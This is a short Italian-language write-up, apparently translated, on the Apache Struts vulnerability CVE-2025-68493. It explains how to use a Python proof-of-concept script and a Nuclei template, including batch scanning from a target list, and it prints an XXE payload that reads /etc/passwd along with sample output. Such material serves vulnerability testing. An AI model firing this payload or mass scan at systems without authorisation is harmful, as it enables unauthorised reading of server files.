
CVE-2025-68493
CVE-2025-68493
[1] Vulnerabilità Apache Struts XWork XML CVE-2025-68493 PoC e script | ZONE.CI 全球网. https://zone.ci/secarticles/wx/486533.html
Per verificare e sfruttare la vulnerabilità CVE-2025-68493, è possibile utilizzare lo script Python PoC e il template YAML Nuclei forniti di seguito.
Nome dello script: cve_2025_68493_poc.py
Funzione: Questo script viene utilizzato per verificare la vulnerabilità su un singolo target, tentando di leggere un file specificato (predefinito: /etc/passwd).
Prerequisiti:
requests (pip install requests)Parametri della riga di comando:
-u, --url: URL base dell'applicazione target (es: http://127.0.0.1:8080)-f, --file: Percorso del file target da leggere (predefinito: /etc/passwd)Esempio:
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
Output previsto:
Se il target è vulnerabile e la lettura del file ha successo, verrà mostrato un output simile al seguente:
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
Nome del template: cve-2025-68493.yaml
Funzione: Questo template viene utilizzato per eseguire scansioni batch su più target con lo strumento Nuclei, al fine di rilevare la vulnerabilità CVE-2025-68493.
Prerequisiti:
Parametri della riga di comando:
-t: Percorso del file template Nuclei-u: URL singolo del target-l: File contenente più URL targetEsempio:
Scansione di un singolo target:
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
Scansione batch:
Supponiamo di avere un file chiamato targets.txt, in cui ogni riga contiene un URL target:
http://target1.com:8080
http://target2.com:8080
Esegui il seguente comando per la scansione batch:
nuclei -t cve-2025-68493.yaml -l targets.txt